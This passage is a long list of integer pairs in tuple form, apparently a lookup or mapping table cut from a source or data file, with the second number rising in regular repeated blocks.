(1075, 143),
(1076, 143),
(1077, 143),
(1078, 143),
(1079, 143),
(1080, 143),
(1081, 144),
(1082, 144),
(1083, 144),
(1084, 144),
(1085, 144),
(1086, 144),
(1087, 145),
(1088, 145),
(1089, 145),
(1090, 145),
(1091, 145),
(1092, 145),
(1093, 146),
(1094, 146),
(1095, 146),
(1096, 146),
(1097, 146),
(1098, 146),
(1099, 147),
(1100, 147),
(1101, 147),
(1102, 147),
(1103, 147),
(1104, 147),
(1105, 148),
(1106, 148),
(1107, 148),
(1108, 148),
(1109, 148),
(1110, 148),
(1111, 149),
(1112, 149),
(1113, 149),
(1114, 149),
(1115, 149),
(1116, 149),
(1117, 150),
(1118, 150),
(1119, 150),
(1120, 150),
(1121, 150),
(1122, 150),
(1123, 151),
(1124, 151),
(1125, 151),
(1126, 151),
(1127, 151),
(1128, 151),
(1129, 152),
(1130, 152),
(1131, 152),
(1132, 152),
(1133, 152),
(1134, 152),
(1135, 153),
(1136, 153),
(1137, 153),
(1138, 153),
(1139, 153),
(1140, 153),
(1141, 154),
(1142, 154),
(1143, 154),
(1144, 154),
(1145, 154),
(1146, 154),
(1147, 155),
(1148, 155),
(1149, 155),
(1150, 155),
(1151, 155),
(1152, 155),
(1153, 155),
(1154, 155),
(1155, 155),
(1156, 156),
(1157, 156),
(1158, 156),
(1159, 156),
(1160, 156),
(1161, 156),
(1162, 157),
(1163, 157),
(1164, 157),
(1165, 157),
(1166, 157),
(1167, 157),
(1168, 158),
(1169, 158),
(1170, 158),
(1171, 158),
(1172, 158),
(1173, 158),
(1174, 159),
(1175, 159),
(1176, 159),
(1177, 159),
(1178, 159),
(1179, 159),
(1180, 160),
(1181, 161),
(1182, 162),
(1183, 163),
(1184, 164),
(1185, 165),
(1186, 166),
(1187, 167),
(1188, 168),
(1189, 169),
(1190, 170),
(1191, 171),
(1192, 172),
(1193, 173),
(1194, 174),
(1195, 175),
(1196, 176),
(1197, 177),
(1198, 178),
(1199, 179),
(1200, 180),
(1201, 181),
(1202, 182),
(1203, 183),
(1204, 184),
(1205, 185),
(1206, 186),
(1207, 187),
(1208, 188),
(1209, 189),
(1210, 190),
(1211, 191),
(1212, 192),
(1213, 193),
(1214, 194),
(1215, 195),
(1216, 196),
(1217, 197),
(1218, 198),
(1219, 199),
(1220, 200),
(1221, 201),
(1222, 202),
(1223, 203),
(1224, 204),
(1225, 205),
(1226, 206),
(1227, 207),
(1228, 208),
(1229, 209),
(1230, 210),
(1231, 211),
(1232, 212),
(1233, 213),
(1234, 214),
(1235, 215),
(1236, 216),
(1237, 217),
(1238, 218),
(1239, 219),
(1240, 220),
(1241, 221),
(1242, 222),
(1243, 223),
(1244, 224),
(1245, 225),
(1246, 226),
(1247, 227),
(1248, 228),
(1249, 229),
(1250, 230),
(1251, 231),
(1252, 232),
(1253, 233),
(1254, 234),
(1255, 235),
(1256, 236),
(1257, 237),
(1258, 238),
(1259, 239),
(1260, 240),
(1261, 241),
(1262, 242),
(1263, 243),
(1264, 244),
(1265, 245),
(1266, 246),
(1267, 247),
(1268, 248),
(1269, 249),
(1270, 250),
(1271, 251),
(1272, 252),
(1273, 253),
(1274, 254),
(1275, 255),
(1276, 256),
(1277, 257),
(1278, 258),
(1279, 259),
(1280, 160),
(1281, 161),
(1282, 162),
(1283, 163),
(1284, 164),
(1285, 165),
(1286, 166),
(1287, 167),
(1288, 168),
(1289, 169),
(1290, 170),
(1291, 171),
(1292, 172),
(1293, 173),
(1294, 174),
(1295, 175),
(1296, 176),
(1297, 177),
(1298, 178),
(1299, 179),
(1300, 180),
(1301, 181),
(1302, 182),
(1303, 183),
(1304, 184),
(1305, 185),
(1306, 186),
(1307, 187),
(1308, 188),
(1309, 189),
(1310, 190),
(1311, 191),
(1312, 192),
(1313, 193),
(1314, 194),
(1315, 195),
(1316, 196),
(1317, 197),
(1318, 198),
(1319, 199),
(1320, 200),
(1321, 201),
(1322, 202),
(1323, 203),
(1324, 204),
(1325, 205),
(1326, 206),
(1327, 207),
(1328, 208),
(1329, 209),
(1330, 210),
(1331, 211),
(1332, 212),
(1333, 213),
(1334, 214),
(1335, 215),
(1336, 216),
(1337, 217),
(1338, 218),
(1339, 219),
(1340, 220),
(1341, 221),
(1342, 222),
(1343, 223),
(1344, 224),
(1345, 225),
(1346, 226),
(1347, 227),
(1348, 228),
(1349, 229),
(1350, 230),
(1351, 231),
(1352, 232),
(1353, 233),
(1354, 234),
(1355, 235),
(1356, 236),
(1357, 237),
(1358, 238),
(1359, 239),
(1360, 240),
(1361, 241),
(1362, 242),
(1363, 243),
(1364, 244),
(1365, 245),
(1366, 246),
(1367, 247),
(1368, 248),
(1369, 249),
(1370, 250),
(1371, 251),
(1372, 252),
(1373, 253),
(1374, 254),
(1375, 255),
(1376, 256),
(1377, 257),
(1378, 258),
(1379, 259),
(1380, 160),
(1381, 160),
(1382, 160),
(1383, 160),
(1384, 160),
(1385, 160),
(1386, 161),
(1387, 161),
(1388, 161),
(1389, 161),
(1390, 161),
(1391, 161),
(1392, 162),
(1393, 162),
(1394, 162),
(1395, 162),
(1396, 162),
(1397, 162),
(1398, 163),
(1399, 163),
(1400, 163),
(1401, 163),
(1402, 163),
(1403, 163),
(1404, 164),
(1405, 164),
(1406, 164),
(1407, 164),
(1408, 164),
(1409, 164),
(1410, 165),
(1411, 165),
(1412, 165),
(1413, 165),
(1414, 165),
(1415, 165),
(1416, 166),
(1417, 166),
(1418, 166),
(1419, 166),
(1420, 166),
(1421, 166),
(1422, 167),
(1423, 167),
(1424, 167),
(1425, 167),
(1426, 167),
(1427, 167),
(1428, 168),
(1429, 168),
(1430, 168),
(1431, 168),
(1432, 168),
(1433, 168),
(1434, 169),
(1435, 169),
(1436, 169),
(1437, 169),
(1438, 169),
(1439, 169),
(1440, 170),
(1441, 170),
(1442, 170),
(1443, 170),
(1444, 170),
(1445, 170),
(1446, 171),
(1447, 171),
(1448, 171),
(1449, 171),
(1450, 171),
(1451, 171),
(1452, 171),
(1453, 171),
(1454, 171),
(1455, 172),
(1456, 172),
(1457, 172),
(1458, 172),
(1459, 172),
(1460, 172),
(1461, 173),
(1462, 173),
(1463, 173),
(1464, 173),
(1465, 173),
(1466, 173),
(1467, 174),
(1468, 174),
(1469, 174),
(1470, 174),
(1471, 174),
(1472, 174),
(1473, 175),
(1474, 175),
(1475, 175),
(1476, 175),
(1477, 175),
(1478, 175),
(1479, 176),
(1480, 176),
(1481, 176),
(1482, 176),
(1483, 176),
(1484, 176),
(1485, 177),
(1486, 177),
(1487, 177),
(1488, 177),
(1489, 177),
(1490, 177),
(1491, 178),
(1492, 178),
(1493, 178),
(1494, 178),
(1495, 178),
(1496, 178),
(1497, 179),
(1498, 179),
(1499, 179),
(1500, 179),
(1501, 179),
(1502, 179),
(1503, 180),
(1504, 180),
(1505, 180),
(1506, 180),
(1507, 180),
(1508, 180),
(1509, 181),
(1510, 181),
(1511, 181),
(1512, 181),
(1513, 181),
(1514, 181),
(1515, 182),
(1516, 182),
(1517, 182),
(1518, 182),
(1519, 182),
(1520, 182),
(1521, 183),
(1522, 183),
(1523, 183),
(1524, 183),
(1525, 183),
(1526, 183),
(1527, 184),
(1528, 184),
(1529, 184),
(1530, 184),
(1531, 184),
(1532, 184),
(1533, 185),
(1534, 185),
(1535, 185),
(1536, 185),
(1537, 185),
(1538, 185),
(1539, 186),
(1540, 186),
(1541, 186),
(1542, 186),
(1543, 186),
(1544, 186),
(1545, 187),
(1546, 187),
(1547, 187),
(1548, 187),
(1549, 187),
(1550, 187),
(1551, 187),
(1552, 187),
(1553, 187),
(1554, 188),
(1555, 188),
(1556, 188),
(1557, 188),
(1558, 188),
(1559, 188),
(1560, 189),
(1561, 189),
(1562, 189),
(1563, 189),
(1564, 189),
(1565, 189),
(1566, 190),
(1567, 190),
(1568, 190),
(1569, 190),
(1570, 190),
(1571, 190),
(1572, 191),
(1573, 191),
(1574, 191),
(1575, 191),
(1576, 191),
(1577, 191),
(1578, 192),
(1579, 192),
(1580, 192),
(1581, 192),
(1582, 192),
(1583, 192),
(1584, 193),
(1585, 193),
(1586, 193),
(1587, 193),
(1588, 193),
(1589, 193),
(1590, 194),
(1591, 194),
(1592, 194),
(1593, 194),
(1594, 194),
(1595, 194),
(1596, 195),
(1597, 195),
(1598, 195),
(1599, 195),
(1600, 195),
(1601, 195),
(1602, 196),
(1603, 196),
(1604, 196),
(1605, 196),
(1606, 196),
(1607, 196),
(1608, 197),
(1609, 197),
(1610, 197),
(1611, 197),
(1612, 197),
(1613, 197),
(1614, 198),
(1615, 198),
(1616, 198),
(1617, 198),
(1618, 198),
(1619, 198),
(1620, 199),
(1621, 199),
(1622, 199),
(1623, 199),
(1624, 199),
(1625, 199),
(1626, 200),
(1627, 200),
(1628, 200),
(1629, 200),
(1630, 200),
(1631, 200),
(1632, 201),
(1633, 201),
(1634, 201),
(1635, 201),
(1636, 201),
(1637, 201),
(1638, 202),
(1639, 202),
(1640, 202),
(1641, 202),
(1642, 202),
(1643, 202),
(1644, 203),
(1645, 203),
(1646, 203),
(1647, 203),
(1648, 203),
(1649, 203),
(1650, 203),
(1651, 203),
(1652, 203),
(1653, 204),
(1654, 204),
(1655, 204),
(1656, 204),
(1657, 204),
(1658, 204),
(1659, 205),
(1660, 205),
(1661, 205),
(1662, 205),
(1663, 205),
(1664, 205),
(1665, 206),
(1666, 206),
(1667, 206),
(1668, 206),
(1669, 206),
(1670, 206),
(1671, 207),
(1672, 207),
(1673, 207),
(1674, 207),
(1675, 207),
(1676, 207),
(1677, 208),
(1678, 208),
(1679, 208),
(1680, 208),
(1681, 208),
(1682, 208),
(1683, 209),
(1684, 209),
(1685, 209),
(1686, 209),
(1687, 209),
(1688, 209),
(1689, 210),
(1690, 210),
(1691, 210),
(1692, 210),
(1693, 210),
(1694, 210),
(1695, 211),
(1696, 211),
(1697, 211),
(1698, 211),
(1699, 211),
(1700, 211),
(1701, 212),
(1702, 212),
(1703, 212),
(1704, 212),
(1705, 212),
(1706, 212),
(1707, 213),
(1708, 213),
(1709, 213),
(1710, 213),
(1711, 213),
(1712, 213),
(1713, 214),
(1714, 214),
(1715, 214),
(1716, 214),
(1717, 214),
(1718, 214),
(1719, 215),
(1720, 215),
(1721, 215),
(1722, 215),
(1723, 215),
(1724, 215),
(1725, 216),
(1726, 216),
(1727, 216),
(1728, 216),
(1729, 216),
(1730, 216),
(1731, 217),
(1732, 217),
(1733, 217),
(1734, 217),
(1735, 217),
(1736, 217),
(1737, 218),
(1738, 218),
(1739, 218),
(1740, 218),
(1741, 218),
(1742, 218),
(1743, 219),
(1744, 219),
(1745, 219),
(1746, 219),
(1747, 219),
(1748, 219),
(1749, 219),
(1750, 219),
(1751, 219),
(1752, 220),
(1753, 220),
(1754, 220),
(1755, 220),
(1756, 220),
(1757, 220),
(1758, 221),
(1759, 221),
(1760, 221),
(1761, 221),
(1762, 221),
(1763, 221),
(1764, 222),
(1765, 222),
(1766, 222),
(1767, 222),
(1768, 222),
(1769, 222),
(1770, 223),
(1771, 223),
(1772, 223),
(1773, 223),
(1774, 223),
(1775, 223),
(1776, 224),
(1777, 224),
(1778, 224),
(1779, 224),
(1780, 224),
(1781, 224),
(1782, 225),
(1783, 225),
(1784, 225),
(1785, 225),
(1786, 225),
(1787, 225),
(1788, 226),
(1789, 226),
(1790, 226),
(1791, 226),
(1792, 226),
(1793, 226),
(1794, 227),
(1795, 227),
(1796, 227),
(1797, 227),
(1798, 227),
(1799, 227),
(1800, 228),
(1801, 228),
(1802, 228),
(1803, 228),
(1804, 228),
(1805, 228),
(1806, 229),
(1807, 229),
(1808, 229),
(1809, 229),
(1810, 229),
(1811, 229),
(1812, 230),
(1813, 230),
(1814, 230),
(1815, 230),
(1816, 230),
(1817, 230),
(1818, 231),
(1819, 231),
(1820, 231),
(1821, 231),
(1822, 231),
(1823, 231),
(1824, 232),
(1825, 232),
(1826, 232),
(1827, 232),
(1828, 232),
(1829, 232),
(1830, 233),
(1831, 233),
(1832, 233),
(1833, 233),
(1834, 233),
(1835, 233),
(1836, 234),
(1837, 234),
(1838, 234),
(1839, 234),
(1840, 234),
(1841, 234),
(1842, 235),
(1843, 235),
(1844, 235),
(1845, 235),
(1846, 235),
(1847, 235),
(1848, 235),
(1849, 235),
(1850, 235),
(1851, 236),
(1852, 236),
(1853, 236),
(1854, 236),
(1855, 236),
(1856, 236),
(1857, 237),
(1858, 237),
(1859, 237),
(1860, 237),
(1861, 237),
(1862, 237),
(1863, 238),
(1864, 238),
(1865, 238),
(1866, 238),
(1867, 238),
(1868, 238),
(1869, 239),
(1870, 239),
(1871, 239),
(1872, 239),
(1873, 239),
(1874, 239),
(1875, 240),
(1876, 240),
(1877, 240),
(1878, 240),
(1879, 240),
(1880, 240),
(1881, 241),
(1882, 241),
(1883, 241),
(1884, 241),
(1885, 241),
(1886, 241),
(1887, 242),
(1888, 242),
(1889, 242),
(1890, 242),
(1891, 242),
(1892, 242),
(1893, 243),
(1894, 243),
(1895, 243),
(1896, 243),
(1897, 243),
(1898, 243),
(1899, 244),
(1900, 244),
(1901, 244),
(1902, 244),
(1903, 244),
(1904, 244),
(1905, 245),
(1906, 245),
(1907, 245),
(1908, 245),
(1909, 245),
(1910, 245),
(1911, 246),
(1912, 246),
(1913, 246),
(1914, 246),
(1915, 246),
(1916, 246),
(1917, 247),
(1918, 247),
(1919, 247),
(1920, 247),
(1921, 247),
(1922, 247),
(1923, 248),
(1924, 248),
(1925, 248),
(1926, 248),
(1927, 248),
(1928, 248),
(1929, 249),
(1930, 249),
(1931, 249),
(1932, 249),
(1933, 249),
(1934, 249),
(1935, 250),
(1936, 250),
(1937, 250),
(1938, 250),
(1939, 250),
(1940, 250),
(1941, 251),
(1942, 251),
(1943, 251),
(1944, 251),
(1945, 251),
(1946, 251),
(1947, 251),
(1948, 251),
(1949, 251),
(1950, 252),
(1951, 252),
(1952, 252),
(1953, 252),
(1954, 252),
(1955, 252),
(1956, 253),
(1957, 253),
(1958, 253),
(1959, 253),
(1960, 253),
(1961, 253),
(1962, 254),
(1963, 254),
(1964, 254),
(1965, 254),
(1966, 254),
(1967, 254),
(1968, 255),
(1969, 255),
(1970, 255),
(1971, 255),
(1972, 255),
(1973, 255),
(1974, 256),
(1975, 256),
(1976, 256),
(1977, 256),
(1978, 256),
(1979, 256),
(1980, 257),
(1981, 257),
(1982, 257),
(1983, 257),
(1984, 257),
(1985, 257),
(1986, 258),
(1987, 258),
(1988, 258),
(1989, 258),
(1990, 258),
(1991, 258),
(1992, 259),
(1993, 259),
(1994, 259),
(1995, 259),
(1996, 259),
(1997, 259),
(1998, 260),
(1999, 261),
(2000, 262),
(2001, 263),
(2002, 264),
(2003, 265),
(2004, 266),
(2005, 267),
(2006, 268),
(2007, 269),
(2008, 270),
(2009, 271),
(2010, 272),
(2011, 273),
(2012, 274),
(2013, 275),
(2014, 276),
(2015, 277),
(2016, 278),
(2017, 279),
(2018, 280),
(2019, 281),
(2020, 282),
(2021, 283),
(2022, 284),
(2023, 285),
(2024, 286),
(2025, 287),
(2026, 288),
(2027, 289),
(2028, 290),
(2029, 291),
(2030, 292),
(2031, 293),
(2032, 294),
(2033, 295),
(2034, 296),
(2035, 297),
(2036, 298),
(2037, 299),
(2038, 300),
(2039, 301),
(2040, 302),
(2041, 303),
(2042, 304),
(2043, 305),
(2044, 306),
(2045, 307),
(2046, 308),
(2047, 309),
(2048, 310),
(2049, 311),
(2050, 312),
(2051, 313),
(2052, 314),
(2053, 315),
(2054, 316),
(2055, 317),
(2056, 318),
(2057, 319),
(2058, 320),
(2059, 321),
(2060, 322),
(2061, 323),
(2062, 324),
(2063, 325),
(2064, 326),
(2065, 327),
(2066, 328),
(2067, 329),
(2068, 330),
(2069, 331),
(2070, 332),
(2071, 333),
(2072, 334),
(2073, 335),
(2074, 336),
(2075, 337),
(2076, 338),
(2077, 339),
(2078, 340),
(2079, 341),
(2080, 342),
(2081, 343),
(2082, 344),
(2083, 345),
(2084, 346),
(2085, 347),
(2086, 348),
(2087, 349),
(2088, 350),
(2089, 351),
(2090, 352),
(2091, 353),
(2092, 354),
(2093, 355),
(2094, 356),
(2095, 357),
(2096, 358),
(2097, 359),
(2098, 260),
(2099, 261),
(2100, 262),
(2101, 263),
(2102, 264),
(2103, 265),
(2104, 266),
(2105, 267),
(2106, 268),
(2107, 269),
(2108, 270),
(2109, 271),
(2110, 272),
(2111, 273),
(2112, 274),
(2113, 275),
(2114, 276),
(2115, 277),
(2116, 278),
(2117, 279),
(2118, 280),
(2119, 281),
(2120, 282),
(2121, 283),
(2122, 284),
(2123, 285),
(2124, 286),
(2125, 287),
(2126, 288),
(2127, 289),
(2128, 290),
(2129, 291),
(2130, 292),
(2131, 293),
(2132, 294),
(2133, 295),
(2134, 296),
(2135, 297),
(2136, 298),
(2137, 299),
(2138, 300),
(2139, 301),
(2140, 302),
(2141, 303),
(2142, 304),
(2143, 305),
(2144, 306),
(2145, 307),
(2146, 308),
(2147, 309),
(2148, 310),
(2149, 311),
(2150, 312),
(2151, 313),
(2152, 314),
(2153, 315),
(2154, 316),
(2155, 317),
(2156, 318),
(2157, 319),
(2158, 320),
(2159, 321),
(2160, 322),
(2161, 323),
(2162, 324),
(2163, 325),
(2164, 326),
(2165, 327),
(2166, 328),
(2167, 329),
(2168, 330),
(2169, 331),
(2170, 332),
(2171, 333),
(2172, 334),
(2173, 335),
(2174, 336),
(2175, 337),
(2176, 338),
(2177, 339),
(2178, 340),
(2179, 341),
(2180, 342),
(2181, 343),
(2182, 344),
(2183, 345),
(2184, 346),
(2185, 347),
(2186, 348),
(2187, 349),
(2188, 350),
(2189, 351),
(2190, 352),
(2191, 353),
(2192, 354),
(2193, 355),
(2194, 356),
(2195, 357),
(2196, 358),
(2197, 359),
(2198, 260),
(2199, 260),
(2200, 260),
(2201, 260),
(2202, 260),
(2203, 260),
(2204, 261),
(2205, 261),
(2206, 261),
(2207, 261),
(2208, 261),
(2209, 261),
(2210, 262),
(2211, 262),
(2212, 262),
(2213, 262),
(2214, 262),
(2215, 262),
(2216, 263),
(2217, 263),
(2218, 263),
(2219, 263),
(2220, 263),
(2221, 263),
(2222, 264),
(2223, 264),
(2224, 264),
(2225, 264),
(2226, 264),
(2227, 264),
(2228, 265),
(2229, 265),
(2230, 265),
(2231, 265),
(2232, 265),
(2233, 265),
(2234, 266),
(2235, 266),
(2236, 266),
(2237, 266),
(2238, 266),
(2239, 266),
(2240, 267),
(2241, 267),
(2242, 267),
(2243, 267),
(2244, 267),
(2245, 267),
(2246, 267),
(2247, 267),
(2248, 267),
(2249, 268),
(2250, 268),
(2251, 268),
(2252, 268),
(2253, 268),
(2254, 268),
(2255, 269),
(2256, 269),
(2257, 269),
(2258, 269),
(2259, 269),
(2260, 269),
(2261, 270),
(2262, 270),
(2263, 270),
(2264, 270),
(2265, 270),
(2266, 270),
(2267, 271),
(2268, 271),
(2269, 271),
(2270, 271),
(2271, 271),
(2272, 271),
(2273, 272),
(2274, 272),
(2275, 272),
(2276, 272),
(2277, 272),
(2278, 272),
(2279, 273),
(2280, 273),
(2281, 273),
(2282, 273),
(2283, 273),
(2284, 273),
(2285, 274),
(2286, 274),
(2287, 274),
(2288, 274),
(2289, 274),
(2290, 274),
(2291, 275),
(2292, 275),
(2293, 275),
(2294, 275),
(2295, 275),
(2296, 275),
(2297, 276),
(2298, 276),
(2299, 276),
(2300, 276),
(2301, 276),
(2302, 276),
(2303, 277),
(2304, 277),
(2305, 277),
(2306, 277),
(2307, 277),
(2308, 277),
(2309, 278),
(2310, 278),
(2311, 278),
(2312, 278),
(2313, 278),
(2314, 278),
(2315, 279),
(2316, 279),
(2317, 279),
(2318, 279),
(2319, 279),
(2320, 279),
(2321, 280),
(2322, 280),
(2323, 280),
(2324, 280),
(2325, 280),
(2326, 280),
(2327, 281),
(2328, 281),
(2329, 281),
(2330, 281),
(2331, 281),
(2332, 281),
(2333, 282),
(2334, 282),
(2335, 282),
(2336, 282),
(2337, 282),
(2338, 282),
(2339, 283),
(2340, 283),
(2341, 283),
(2342, 283),
(2343, 283),
(2344, 283),
(2345, 283),
(2346, 283),
(2347, 283),
(2348, 284),
(2349, 284),
(2350, 284),
(2351, 284),
(2352, 284),
(2353, 284),
(2354, 285),
(2355, 285),
(2356, 285),
(2357, 285),
(2358, 285),
(2359, 285),
(2360, 286),
(2361, 286),
(2362, 286),
(2363, 286),
(2364, 286),
(2365, 286),
(2366, 287),
(2367, 287),
(2368, 287),
(2369, 287),
(2370, 287),
(2371, 287),
(2372, 288),
(2373, 288),
(2374, 288),
(2375, 288),
(2376, 288),
(2377, 288),
(2378, 289),
(2379, 289),
(2380, 289),
(2381, 289),
(2382, 289),
(2383, 289),
(2384, 290),
(2385, 290),
(2386, 290),
(2387, 290),
(2388, 290),
(2389, 290),
(2390, 291),
(2391, 291),
(2392, 291),
(2393, 291),
(2394, 291),
(2395, 291),
(2396, 292),
(2397, 292),
(2398, 292),
(2399, 292),
(2400, 292),
(2401, 292),
(2402, 293),
(2403, 293),
(2404, 293),
(2405, 293),
(2406, 293),
(2407, 293),
(2408, 294),
(2409, 294),
(2410, 294),
(2411, 294),
(2412, 294),
(2413, 294),
(2414, 295),
(2415, 295),
(2416, 295),
(2417, 295),
(2418, 295),
(2419, 295),
(2420, 296),
(2421, 296),
(2422, 296),
(2423, 296),
(2424, 296),
(2425, 296),
(2426, 297),
(2427, 297),
(2428, 297),
(2429, 297),
(2430, 297),
(2431, 297),
(2432, 298),
(2433, 298),
(2434, 298),
(2435, 298),
(2436, 298),
(2437, 298),
(2438, 299),
(2439, 299),
(2440, 299),
(2441, 299),
(2442, 299),
(2443, 299),
(2444, 299),
(2445, 299),
(2446, 299),
(2447, 300),
(2448, 300),
(2449, 300),
(2450, 300),
(2451, 300),
(2452, 300),
(2453, 301),
(2454, 301),
(2455, 301),
(2456, 301),
(2457, 301),
(2458, 301),
(2459, 302),
(2460, 302),
(2461, 302),
(2462, 302),
(2463, 302),
(2464, 302),
(2465, 303),
(2466, 303),
(2467, 303),
(2468, 303),
(2469, 303),
(2470, 303),
(2471, 304),
(2472, 304),
(2473, 304),
(2474, 304),
(2475, 304),
(2476, 304),
(2477, 305),
(2478, 305),
(2479, 305),
(2480, 305),
(2481, 305),
(2482, 305),
(2483, 306),
(2484, 306),
(2485, 306),
(2486, 306),
(2487, 306),
(2488, 306),
(2489, 307),
(2490, 307),
(2491, 307),
(2492, 307),
(2493, 307),
(2494, 307),
(2495, 308),
(2496, 308),
(2497, 308),
(2498, 308),
(2499, 308),
(2500, 308),
(2501, 309),
(2502, 309),
(2503, 309),
(2504, 309),
(2505, 309),
(2506, 309),
(2507, 310),
(2508, 310),
(2509, 310),
(2510, 310),
(2511, 310),
(2512, 310),
(2513, 311),
(2514, 311),
(2515, 311),
(2516, 311),
(2517, 311),
(2518, 311),
(2519, 312),
(2520, 312),
(2521, 312),
(2522, 312),
(2523, 312),
(2524, 312),
(2525, 313),
(2526, 313),
(2527, 313),
(2528, 313),
(2529, 313),
(2530, 313),
(2531, 314),
(2532, 314),
(2533, 314),
(2534, 314),
(2535, 314),
(2536, 314),
(2537, 315),
(2538, 315),
(2539, 315),
(2540, 315),
(2541, 315),
(2542, 315),
(2543, 315),
(2544, 315),
(2545, 315),
(2546, 316),
(2547, 316),
(2548, 316),
(2549, 316),
(2550, 316),
(2551, 316),
(2552, 317),
(2553, 317),
(2554, 317),
(2555, 317),
(2556, 317),
(2557, 317),
(2558, 318),
(2559, 318),
(2560, 318),
(2561, 318),
(2562, 318),
(2563, 318),
(2564, 319),
(2565, 319),
(2566, 319),
(2567, 319),
(2568, 319),
(2569, 319),
(2570, 320),
(2571, 320),
(2572, 320),
(2573, 320),
(2574, 320),
(2575, 320),
(2576, 321),
(2577, 321),
(2578, 321),
(2579, 321),
(2580, 321),
(2581, 321),
(2582, 322),
(2583, 322),
(2584, 322),
(2585, 322),
(2586, 322),
(2587, 322),
(2588, 323),
(2589, 323),
(2590, 323),
(2591, 323),
(2592, 323),
(2593, 323),
(2594, 324),
(2595, 324),
(2596, 324),
(2597, 324),
(2598, 324),
(2599, 324),
(2600, 325),
(2601, 325),
(2602, 325),
(2603, 325),
(2604, 325),
(2605, 325),
(2606, 326),
(2607, 326),
(2608, 326),
(2609, 326),
(2610, 326),
(2611, 326),
(2612, 327),
(2613, 327),
(2614, 327),
(2615, 327),
(2616, 327),
(2617, 327),
(2618, 328),
(2619, 328),
(2620, 328),
(2621, 328),
(2622, 328),
(2623, 328),
(2624, 329),
(2625, 329),
(2626, 329),
(2627, 329),
(2628, 329),
(2629, 329),
(2630, 330),
(2631, 330),
(2632, 330),
(2633, 330),
(2634, 330),
(2635, 330),
(2636, 331),
(2637, 331),
(2638, 331),
(2639, 331),
(2640, 331),
(2641, 331),
(2642, 331),
(2643, 331),
(2644, 331),
(2645, 332),
(2646, 332),
(2647, 332),
(2648, 332),
(2649, 332),
(2650, 332),
(2651, 333),
(2652, 333),
(2653, 333),
(2654, 333),
(2655, 333),
(2656, 333),
(2657, 334),
(2658, 334),
(2659, 334),
(2660, 334),
(2661, 334),
(2662, 334),
(2663, 335),
(2664, 335),
(2665, 335),
(2666, 335),
(2667, 335),
(2668, 335),
(2669, 336),
(2670, 336),
(2671, 336),
(2672, 336),
(2673, 336),
(2674, 336),
(2675, 337),
(2676, 337),
(2677, 337),
(2678, 337),
(2679, 337),
(2680, 337),
(2681, 338),
(2682, 338),
(2683, 338),
(2684, 338),
(2685, 338),
(2686, 338),
(2687, 339),
(2688, 339),
(2689, 339),
(2690, 339),
(2691, 339),
(2692, 339),
(2693, 340),
(2694, 340),
(2695, 340),
(2696, 340),
(2697, 340),
(2698, 340),
(2699, 341),
(2700, 341),
(2701, 341),
(2702, 341),
(2703, 341),
(2704, 341),
(2705, 342),
(2706, 342),
(2707, 342),
(2708, 342),
(2709, 342),
(2710, 342),
(2711, 343),
(2712, 343),
(2713, 343),
(2714, 343),
(2715, 343),
(2716, 343),
(2717, 344),
(2718, 344),
(2719, 344),
(2720, 344),
(2721, 344),
(2722, 344),
(2723, 345),
(2724, 345),
(2725, 345),
(2726, 345),
(2727, 345),
(2728, 345),
(2729, 346),
(2730, 346),
(2731, 346),
(2732, 346),
(2733, 346),
(2734, 346),
(2735, 347),
(2736, 347),
(2737, 347),
(2738, 347),
(2739, 347),
(2740, 347),
(2741, 347),
(2742, 347),
(2743, 347),
(2744, 348),
(2745, 348),
(2746, 348),
(2747, 348),
(2748, 348),
(2749, 348),
(2750, 349),
(2751, 349),
(2752, 349),
(2753, 349),
(2754, 349),
(2755, 349),
(2756, 350),
(2757, 350),
(2758, 350),
(2759, 350),
(2760, 350),
(2761, 350),
(2762, 351),
(2763, 351),
(2764, 351),
(2765, 351),
(2766, 351),
(2767, 351),
(2768, 352),
(2769, 352),
(2770, 352),
(2771, 352),
(2772, 352),
(2773, 352),
(2774, 353),
(2775, 353),
(2776, 353),
(2777, 353),
(2778, 353),
(2779, 353),
(2780, 354),
(2781, 354),
(2782, 354),
(2783, 354),
(2784, 354),
(2785, 354),
(2786, 355),
(2787, 355),
(2788, 355),
(2789, 355),
(2790, 355),
(2791, 355),
(2792, 356),
(2793, 356),
(2794, 356),
(2795, 356),
(2796, 356),
(2797, 356),
(2798, 357),
(2799, 357),
(2800, 357),
(2801, 357),
(2802, 357),
(2803, 357),
(2804, 358),
(2805, 358),
(2806, 358),
(2807, 358),
(2808, 358),
(2809, 358),
(2810, 359),
(2811, 359),
(2812, 359),
(2813, 359),
(2814, 359),
(2815, 359),
(2816, 360),
(2817, 361),
(2818, 362),
(2819, 363),
(2820, 364),
(2821, 365),
(2822, 366),
(2823, 367),
(2824, 368),
(2825, 369),
(2826, 370),
(2827, 371),
(2828, 372),
(2829, 373),
(2830, 374),
(2831, 375),
(2832, 376),
(2833, 377),
(2834, 378),
(2835, 379),
(2836, 380),
(2837, 381),
(2838, 382),
(2839, 383),
(2840, 384),
(2841, 385),
(2842, 386),
(2843, 387),
(2844, 388),
(2845, 389),
(2846, 390),
(2847, 391),
(2848, 392),
(2849, 393),
(2850, 394),
(2851, 395),
(2852, 396),
(2853, 397),
(2854, 398),
(2855, 399),
(2856, 400),
(2857, 401),
(2858, 402),
(2859, 403),
(2860, 404),
(2861, 405),
(2862, 406),
(2863, 407),
(2864, 408),
(2865, 409),
(2866, 410),
(2867, 411),
(2868, 412),
(2869, 413),
(2870, 414),
(2871, 415),
(2872, 416),
(2873, 417),
(2874, 418),
(2875, 419),
(2876, 420),
(2877, 421),
(2878, 422),
(2879, 423),
(2880, 424),
(2881, 425),
(2882, 426),
(2883, 427),
(2884, 428),
(2885, 429),
(2886, 430),
(2887, 431),
(2888, 432),
(2889, 433),
(2890, 434),
(2891, 435),
(2892, 436),
(2893, 437),
(2894, 438),
(2895, 439),
(2896, 440),
(2897, 441),
(2898, 442),
(2899, 443),
(2900, 444),
(2901, 445),
(2902, 446),
(2903, 447),
(2904, 448),
(2905, 449),
(2906, 450),
(2907, 451),
(2908, 452),
(2909, 453),
(2910, 454),
(2911, 455),
(2912, 456),
(2913, 457),
(2914, 458),
(2915, 459),
(2916, 360),
(2917, 361),
(2918, 362),
(2919, 363),
(2920, 364),
(2921, 365),
(2922, 366),
(2923, 367),
(2924, 368),
(2925, 369),
(2926, 370),
(2927, 371),
(2928, 372),
(2929, 373),
(2930, 374),
(2931, 375),
(2932, 376),
(2933, 377),
(2934, 378),
(2935, 379),
(2936, 380),
(2937, 381),
(2938, 382),
(2939, 383),
(2940, 384),
(2941, 385),
(2942, 386),
(2943, 387),
(2944, 388),
(2945, 389),
(2946, 390),
(2947, 391),
(2948, 392),
(2949, 393),
